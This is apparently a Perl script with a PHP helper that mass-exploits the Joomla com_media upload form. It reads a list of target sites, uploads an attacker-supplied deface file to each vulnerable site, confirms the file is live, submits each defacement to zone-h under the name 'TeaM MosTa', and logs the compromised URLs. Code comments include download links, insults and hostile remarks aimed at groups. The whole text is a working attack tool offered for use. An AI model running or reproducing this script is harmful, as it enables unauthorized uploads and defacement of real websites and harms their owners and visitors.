[SCRIPT]=> com_media auto exploiter [Perl/PHP]

1. use LWP::UserAgent;
2. use Term::ANSIColor;
3. use Win32::Console::ANSI;
4.  
5.   # Download Direct : http://www.mediafire.com/download/afa6rb6907a6ztf/media_exploiter.rar
6.   # Video : https://www.youtube.com/watch?v=dBMW9q4rxdw
7.  
8.                    # CoDed CrashBandicot
9.                    # Gr33tz M-A , m0sta & all staff of exploit4arab
10.                    # Fuck All Haters , ALL leechers , Lamers , zionist , Nationalist
11.                    # FUck ALL noob Copying my script , respect coder please
12.                    # if you use the .txt for deface change Keyword line 51 by your keywords
13.                    # Using 2 method for recolt the url for the request post
14.                    # Result in mediaResult.txt , don't rename file up.php
15.  
16. if ($^O =~ /Win/) { system("cls"); } else { system("clear"); }
17.  
18. print color("bold green") ,"\n\n\t                com_media Auto Exploiter\n";
19. print "\t           Usage : perl $0 list.txt owned.txt \n\n";
20. print color 'reset';
21. open(tarrget,"<$ARGV[0]") or die "$!";
22. while(<tarrget>){
23. chomp($_);
24. $target = $_;
25. if($target !~ /http:\/\//)
26. {
27. $target = "http://$target";
28. }
29.  
30. $name = $ARGV[1];
31.  
32. $zeeb = $target."index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=";
33. $ua = LWP::UserAgent->new;
34. $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
35. $fucki = $ua->get($zeeb);
36. $kzz = $fucki->content;
37. if($kzz =~/<form action="(.*?)" id=\"uploadForm\" class=\"form-horizontal\" name=\"uploadForm\" method=\"post\" enctype=\"multipart\/form-data\">/ || $kzz =~ /<form action="(.*?)" id=\"uploadForm\" name=\"uploadForm\" method=\"post\" enctype=\"multipart\/form-data\">/ )
38. {
39.     print color("green"), "\n\n [+] com_media found -> $target"; print color 'reset'; sleep(1);
40.  
41.  $url = $1;
42.  $url =~ s/&amp;/&/gi;
43.  
44.  } else { print "\n\n [+] com_media not found -> $target"; sleep(1);}
45.  
46. $fili = $target."images\/$name";
47.  
48.  system("php up.php $url $name");
49. $ual = LWP::UserAgent->new;
50. $ual->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
51. $trl = $ual->get($fili);
52. if($trl->content =~ /by TeaM MosTa/) {
53. print color("bold green"),"\n\n [+] Owned -> $fili"; print color 'reset';
54.  
55.                 $lwp = LWP::UserAgent->new;
56.                 $res= $lwp->post("http://zone-h.org/notify/single",[
57.                 'defacer'     => 'TeaM MosTa',
58.                 'domain1'   => $fili,
59.                 'hackmode' => '15',
60.                 'reason'       => '1',
61.                 'submit'       => 'Send',
62.                 ]);
63.                 if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
64.                 print "\n      [+] Submit zone-h $1 "; sleep(1);
65.                 }
66.                 else
67.                 {
68.                 print "\n      [+] Submit zone-h ERROR"; sleep(1);
69.                 }
70.  
71. open(fuck ,">>mediaResult.txt");
72. print fuck "$fili\n";
73. close fuck;
74.  
75. }
76. else { print color("red"), "\n\n [+] Not Defaced $target"; print color 'reset'; sleep(1); }
77.  
78.  }
79.  
80.  
81. ###################################################################################################
82. # File name : up.php
83.  
84.  
85.  
86. <?php
87. $url = $argv[1];
88. $uploadfile = $argv[2];
89. $ch = curl_init($url);
90. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
91. curl_setopt($ch, CURLOPT_POST, true);
92. curl_setopt($ch, CURLOPT_POSTFIELDS,
93.  
94. array('Filedata[]'=>"@$uploadfile"));
95.  
96. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
97.  
98. $postResult = curl_exec($ch);
99.  
100. curl_close($ch);
101.  
102. ?>